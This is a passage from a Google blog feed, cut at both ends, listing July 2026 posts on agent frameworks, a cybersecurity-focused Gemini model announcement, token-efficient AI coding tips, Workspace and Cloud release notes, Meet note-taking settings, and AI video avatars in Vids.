&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;12. Build a cross-language multi-agent pipeline with A2A.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; In a large enterprise, different teams will inevitably build agents in different languages. This &lt;/span&gt;&lt;a href="https://developers.googleblog.com/build-cross-language-multi-agent-team-with-google-agent-development-kit-and-a2a/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tutorial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; walks through a contract compliance pipeline where a Python-based agent extracts terms using Gemini and a Go-based agent validates them against corporate policy. The two services connect via the Agent-to-Agent (A2A) protocol and are orchestrated by ADK. You'll learn how RemoteA2aAgent turns any A2A-compliant service into a local sub-agent with a few lines of code.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;13. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Scale agents across frameworks with CrewAI, LangGraph, A2A, and ADK.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Most production teams don't standardize on one agent framework. The &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/next26/scale-agents?hl=en#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows you how to orchestrate across all of them: an ADK control room delegates planning to a LangGraph state machine, which dispatches tasks to a CrewAI execution crew, all connected via the A2A protocol. If one step fails, the control room re-plans automatically.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you want to see the full agent development lifecycle in under 10 minutes, &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=lB96_tdvdow" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;watch this walkthrough&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Otherwise, install &lt;/span&gt;&lt;a href="https://google.github.io/agents-cli/guide/getting-started/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agents CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, open up your coding agent, and &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;start building&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/13-demos-on-gemini-enterprise-agent-platform" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-17T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/13_demos.max-600x600.jpg" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/13_demos.max-600x600.jpg"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/13_demos.max-600x600.jpg" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber</id>
    <title>Introducing Gemini 3.5 Flash Cyber</title>
    <updated>2026-07-17T15:00:11+00:00</updated>
    <content type="html">Google introduces Gemini 3.5 Flash Cyber, a lightweight cybersecurity model to find and patch vulnerabilities.</content>
    <link href="https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-07-17T15:00:11+00:00</published>
    <media:group>
      <media:content url="https://lh3.googleusercontent.com/esSD0-kSrZ8K07XxNkSKL3OGlcx1Cf3M-qiQut0q_vArHMiK2L1CpUIGVkjuQrhu_m0g8UMVflVQpDp7VFAJSubDdCjSXsPJPDeK-PUtaPbqA8W1=w528-h297-n-nu-rw-lo" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://lh3.googleusercontent.com/esSD0-kSrZ8K07XxNkSKL3OGlcx1Cf3M-qiQut0q_vArHMiK2L1CpUIGVkjuQrhu_m0g8UMVflVQpDp7VFAJSubDdCjSXsPJPDeK-PUtaPbqA8W1=w528-h297-n-nu-rw-lo"/>
    </media:group>
    <link rel="enclosure" href="https://lh3.googleusercontent.com/esSD0-kSrZ8K07XxNkSKL3OGlcx1Cf3M-qiQut0q_vArHMiK2L1CpUIGVkjuQrhu_m0g8UMVflVQpDp7VFAJSubDdCjSXsPJPDeK-PUtaPbqA8W1=w528-h297-n-nu-rw-lo" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/android/world-emoji-day-noto-3d</id>
    <title>Designing emoji for the way we communicate today</title>
    <updated>2026-07-17T14:25:00+00:00</updated>
    <content type="html">A series of emoji's: pancakes, tennis, sloth, fried egg, squidthumbs up</content>
    <link href="https://blog.google/products-and-platforms/platforms/android/world-emoji-day-noto-3d" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-17T14:25:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/emoji_blog_social.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/emoji_blog_social.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/emoji_blog_social.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/guide-to-ai-tokenomics-eleven-principles-for-token-efficient-software-engineering</id>
    <title>Guide to AI Tokenomics: Eleven Principles for Token Efficient Software Engineering</title>
    <updated>2026-07-17T09:14:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Optimizing token consumption is key to keeping &lt;/span&gt;&lt;a href="http://antigravity.google" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI coding assistants&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; fast and accurate. You might not be writing every line of code any more, but now you’re responsible for directing those coding assistants to focus on getting the most out of each token. Context bloat increases latency and causes models to forget instructions or hallucinate, it also costs money and drives human attention away from the problems that actually matter. Structured habits help you maintain a fast, precise, and productive feedback loop.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;1. Start with a balanced model&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you are unsure, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;start with &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;the default &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini 3.5 Flash&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Medium &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;reasoning). Gauge complexity as you go. Scale up to larger models or higher reasoning if a task fails, seems to take too many hops, or needs complex design.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;2. Use skills from the beginning&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Avoid explaining your workflow, testing rules, or environment in every prompt. Ask around, find online, or package your own reusable skills with &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;SKILL.md&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files and scripts. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;The agent triggers them automatically, keeping prompts clean&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and avoiding unnecessarily searching for online docs or inspecting local code and environment.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;3. Automate with scripts and CLI tools&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For repetitive chores like formatting many files or extracting log data, have the agent create simple local tools. Use official CLI tools for setup, linting, and testing. Run read-only commands to research the codebase before writing code, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;avoiding long trial-and-error loops&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;4. Delegate output-heavy tasks&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delegate output-heavy tasks, like &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;deep research&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; or separating frontend and backend work, to sub-agents. Once their work is done, you only reconcile the final results, rather than the full trajectory.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;5. Divide and conquer&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;David Rensin wrote “&lt;/span&gt;&lt;a href="https://research.google/pubs/elephants-goldfish-and-the-new-golden-age-of-software-engineering/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Elephants, Goldfish and the New Golden Age of Software Engineering&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;” that explains how to use high-reasoning, long-context sessions ("&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Elephant&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;") to generate a detailed execution plan (the "&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Goldfish&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"). Execute that plan in a clean, low-token session. Checkpoint your progress often with commits or artifacts so you can restart from a clean state when context fills up.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;6. Shift verification left&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automate testing early. Run local builds and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;unit and functional tests before doing UI testing&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Tell the agent to perform the expensive smoke-test in the browser right before handoff. Save expensive verification loops for the very end of the milestone.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;7. Undo when adrift&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If the agent drifts and you know the fix, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;use the Undo button&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in the trajectory thread or revert your files. Do not pile corrective prompts on top of a broken state, which poisons the context.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;8. Be specific with context&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Be specific rather than micro-managing. A clear instruction with a few spelling errors is better than a grammatically accurate broad request. Similarly, pointing the agent to the exact file, section, or error you care about (with an obvious &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;// SHOULD BE X, NOT Y, FIX THIS&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; annotation) instead of sending it on an open-ended search in a 10k log quest goes a long way. Whenever possible, use &lt;/span&gt;&lt;a href="https://antigravity.google/docs/artifact-review" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;inline comments&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, so the agent knows exactly where you want the fix.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;9. Iterate on rules&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you keep correcting the agent's behavior, update your global rules in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AGENTS.md&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or edit the skill. Fix the instructions instead of prompting the agent repeatedly, so the change persists.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;10. Avoid uncontrolled loops&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Supervisor loops that scan projects for pending work can find optimizations, but they can easily burn your entire token budget. If you run loops, set strict limits and stop conditions. High autonomy requires tighter guardrails and better evaluations. Do not let agents poll status in a loop; use event-driven wakeups. &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;11. Start new sessions for each new topic&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are continuing on the same topic, using the same chat can allow the agent to reuse the existing context, but if you are changing the topic, start a new chat. The agent will be able to provide better answers with fewer tokens if it only pulls in the context that it needs.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Prioritize and spend wisely&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Tokens aren’t infinite. Behind every LLM call is a real, physical machine doing work to produce output for you. Prioritize the projects and features you care about.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Token optimization is about directing the AI's attention. By using a tiered approach you keep development fast and output sharp, while optimizing spending. We hope these 11 principles will inspire you to find the right balance between steering and automation in your AI sessions.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/guide-to-ai-tokenomics-eleven-principles-for-token-efficient-software-engineering" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-17T09:14:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_Steampunk_AI_Tokenomics_Header.max-600x600.jpg" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_Steampunk_AI_Tokenomics_Header.max-600x600.jpg"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_Steampunk_AI_Tokenomics_Header.max-600x600.jpg" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_17_2026</id>
    <title>Workspace Release Notes — July 17, 2026</title>
    <updated>2026-07-17T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; You no longer need to manually configure a Google
Chat app in the Google Cloud console for integrations that only use the
Chat API to read data (for example, &lt;code&gt;GetSpace&lt;/code&gt;, &lt;code&gt;ListMessages&lt;/code&gt;) on behalf
of a user using OAuth. For read-only actions, you only need to enable the
API and create an OAuth client.&lt;/p&gt;
&lt;p&gt;For more information, see
&lt;a href="https://developers.google.com/workspace/chat/configure-chat-api"&gt;Configure the Google Chat API&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#July_17_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_17_2026</id>
    <title>Cloud Release Notes — July 17, 2026</title>
    <updated>2026-07-17T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Batch&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/batch/docs/create-run-job-instance-flexibility"&gt;Instance flexibility&lt;/a&gt; is available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.
Instance flexibility lets you allow a job to run on multiple machine types that
you specify and can optionally rank. Use instance flexibility to improve
&lt;em&gt;obtainability&lt;/em&gt;—the probability that resources are available to run your
job. For example, by allowing multiple machine types, you can reduce the
probability of resource availability errors and try to obtain Spot VMs
that are less likely to be preempted.&lt;/p&gt;
&lt;p&gt;To get started, see &lt;a href="https://docs.cloud.google.com/batch/docs/improve-obtainability-overview"&gt;Improve resource obtainability for jobs&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_17_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-17T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/new-google-meet-take-notes-for-me-settings-for-admins-and-end-users.html</id>
    <title>New Google Meet 'Take notes for me' settings for admins and end users</title>
    <updated>2026-07-16T20:07:25+00:00</updated>
    <content type="html">&lt;p&gt;To help users remember to capture notes for meetings when it’s most valuable, we’re updating the admin and end user settings that let them pre-configure AI note-taking for Google Meet.&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;Admin settings&lt;/h4&gt;&lt;p&gt;Previously, admins could only enable or disable automatic note-taking for all meetings. Today, we’re starting to roll out a third option, which will allow admins to enable automatic note-taking only for meetings with three or more people.&lt;/p&gt;&lt;p&gt;Customers on &lt;b&gt;Business Standard and Business Plus plans&lt;/b&gt; will soon see this setting turned &lt;b&gt;ON by default&lt;/b&gt;; the setting will be &lt;b&gt;OFF by default&lt;/b&gt; for customers on &lt;b&gt;Enterprise Standard, Enterprise Plus, and Frontline Plus plans, as well as those with the Google AI Pro for Education add-on.&lt;/b&gt; There will be no impact to the end user experience on any plan before September 21, 2026. If you want to change your settings, you can do so in the Admin console.&lt;/p&gt;&lt;p&gt;&lt;b&gt;If you currently participate in the &lt;a href="https://workspaceupdates.googleblog.com/2026/02/new-take-notes-for-me-configuration-in-admin-console-for-select-gemini-alpha-customers.html" target="_blank"&gt;Gemini Alpha program&lt;/a&gt;, and previously tested this setting, it may already be ON.&lt;/b&gt; Please review the current state of the settings for your organization in the Admin console before September 21, 2026.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_OSbGR0fwBG4msocDfSSguGINPugjcREgLF4SHipY0cUB__xjm_iRrs7wGhKCVavLJnc5OTvf-iasWbHSfxD4o_1QItnzRBw0qF0sspBY_cOXvT3tv2uZsAg5I5LbTw0QFpDZzTCv4N2U4uQSzT88WWPi4QT7b5__UYYsqc6ayY1rGZhS_fRpP2h9WE/s1836/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_OSbGR0fwBG4msocDfSSguGINPugjcREgLF4SHipY0cUB__xjm_iRrs7wGhKCVavLJnc5OTvf-iasWbHSfxD4o_1QItnzRBw0qF0sspBY_cOXvT3tv2uZsAg5I5LbTw0QFpDZzTCv4N2U4uQSzT88WWPi4QT7b5__UYYsqc6ayY1rGZhS_fRpP2h9WE/s1600/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;End user settings&lt;/h4&gt;&lt;p&gt;We’re also introducing a way for end users to enable note-taking only for meetings with three or more participants. Once the “For all meetings I host with 3+ guests” option rolls out, users should revisit their settings to confirm they’re configured as desired. This option will become available no sooner than September 21; stay tuned to the Workspace Updates blog to be notified when that rollout starts.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9v9CuxrTcrnH_UetM2jS-kaJbExG2mXq9SKmhTb7JFEk1bKjkFnf5602JQkscPujszT8qpqOacJaqrNwKyq66Q76ckjHeXPSB46Qwzso2lsNtg2kcfoyEYS0FxuIPoZyeVe3rEhSiKHqlzTqf4nLw_XCHDKw1iOS0nsJ9zKpoAvF7qSGiQfH60fKsVg4/s2048/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508%20-%201.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9v9CuxrTcrnH_UetM2jS-kaJbExG2mXq9SKmhTb7JFEk1bKjkFnf5602JQkscPujszT8qpqOacJaqrNwKyq66Q76ckjHeXPSB46Qwzso2lsNtg2kcfoyEYS0FxuIPoZyeVe3rEhSiKHqlzTqf4nLw_XCHDKw1iOS0nsJ9zKpoAvF7qSGiQfH60fKsVg4/s1600/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508%20-%201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins for Business Standard and Business Plus organizations: &lt;/b&gt;This new setting is ON by default. If you wish to change your settings, you should do so before September 21, 2026, to avoid any impact for end users. Visit the Help Center for &lt;a href="https://knowledge.workspace.google.com/admin/meet/let-google-meet-ai-take-notes-for-my-users?visit_id=639183605324050647-2510769763&amp;amp;rd=1" target="_blank"&gt;more information on how to adjust these settings&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Admins for Enterprise Standard, Enterprise Plus, Frontline Plus, and Google AI Pro for Education organizations:&lt;/b&gt; This new setting is OFF by default. You can adjust this setting in the Admin console once it appears, but it will not affect the end user experience before September 21, 2026. Visit the Help Center for &lt;a href="https://knowledge.workspace.google.com/admin/meet/let-google-meet-ai-take-notes-for-my-users?visit_id=639183605324050647-2510769763&amp;amp;rd=1" target="_blank"&gt;more information on how to adjust these settings&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Admins for organizations participating in Gemini Alpha program:&lt;/b&gt; Your settings may be impacted by previous configurations. Please review your settings before September 21, 2026, to ensure they’re configured correctly.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users on all plans: &lt;/b&gt;The default set by admins will go into effect for end users no sooner than September 21, 2026. Users can override this default in the Meet user settings after that date. Visit the Help Center to &lt;a href="https://support.google.com/meet/answer/16909639" target="_blank"&gt;learn more about Meeting settings for “take notes for me”&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;h4 style="text-align: left;"&gt;Admin setting&lt;/h4&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Rolling out now, with expected completion by August 3, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;End user setting&lt;/h4&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting no sooner than September 21, 2026*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;*We’ll post an update on the Workspace Updates blog when the end user setting rollout begins.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business:&lt;/b&gt; Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Frontline Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Google AI Pro for Education&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/14754931" target="_blank"&gt;Take notes for me in Google Meet&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates&amp;nbsp; Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/02/new-user-controls-for-take-notes-for-me.html" target="_blank"&gt;New user controls for Take notes for me&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/new-google-meet-take-notes-for-me-settings-for-admins-and-end-users.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-16T20:07:25+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_OSbGR0fwBG4msocDfSSguGINPugjcREgLF4SHipY0cUB__xjm_iRrs7wGhKCVavLJnc5OTvf-iasWbHSfxD4o_1QItnzRBw0qF0sspBY_cOXvT3tv2uZsAg5I5LbTw0QFpDZzTCv4N2U4uQSzT88WWPi4QT7b5__UYYsqc6ayY1rGZhS_fRpP2h9WE/s72-c/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_OSbGR0fwBG4msocDfSSguGINPugjcREgLF4SHipY0cUB__xjm_iRrs7wGhKCVavLJnc5OTvf-iasWbHSfxD4o_1QItnzRBw0qF0sspBY_cOXvT3tv2uZsAg5I5LbTw0QFpDZzTCv4N2U4uQSzT88WWPi4QT7b5__UYYsqc6ayY1rGZhS_fRpP2h9WE/s72-c/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_OSbGR0fwBG4msocDfSSguGINPugjcREgLF4SHipY0cUB__xjm_iRrs7wGhKCVavLJnc5OTvf-iasWbHSfxD4o_1QItnzRBw0qF0sspBY_cOXvT3tv2uZsAg5I5LbTw0QFpDZzTCv4N2U4uQSzT88WWPi4QT7b5__UYYsqc6ayY1rGZhS_fRpP2h9WE/s72-c/New%20Google%20Meet%20'Take%20notes%20for%20me'%20settings%20for%20admins%20and%20end%20users%20-%206508.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/cast-yourself-in-ai-video-clips-using-your-personal-avatar-with-Gemini-Omni-in-Vids.html</id>
    <title>Cast yourself in AI video clips using your personal avatar with Gemini Omni in Vids</title>
    <updated>2026-07-16T20:06:53+00:00</updated>
    <content type="html">&lt;p&gt;Users now have access to Gemini Omni directly within &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt;. With Gemini Omni, you can create videos using your personal avatar to scale your presence without the studio time. Use a secure verification process to capture your likeness and then select it as a character in Omni generations within Vids.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeIquZqGygFpCGeo8dOUArA4Hb2K8-9KiKRrSrKiNmb8cMT2Th4VemOsnJSHvvE72c_PoPoVZj-89hlds8sfiVa8759ZYz5bEYgjngBMha0u66Y8d4tkwnjlKvG19Ppu1d0u0J0QB2aDMs5w3WJZSgPg8UylT5_30RU1ASLwvKXVmGlt6v9exwLDfq9c/s1920/Cast%20yourself%20in%20AI%20video%20clips%20using%20your%20personal%20avatar%20with%20Gemini%20Omni%20in%20Vids%20-%206736.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeIquZqGygFpCGeo8dOUArA4Hb2K8-9KiKRrSrKiNmb8cMT2Th4VemOsnJSHvvE72c_PoPoVZj-89hlds8sfiVa8759ZYz5bEYgjngBMha0u66Y8d4tkwnjlKvG19Ppu1d0u0J0QB2aDMs5w3WJZSgPg8UylT5_30RU1ASLwvKXVmGlt6v9exwLDfq9c/s1600/Cast%20yourself%20in%20AI%20video%20clips%20using%20your%20personal%20avatar%20with%20Gemini%20Omni%20in%20Vids%20-%206736.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Personal avatar user experience&lt;br /&gt;&lt;br 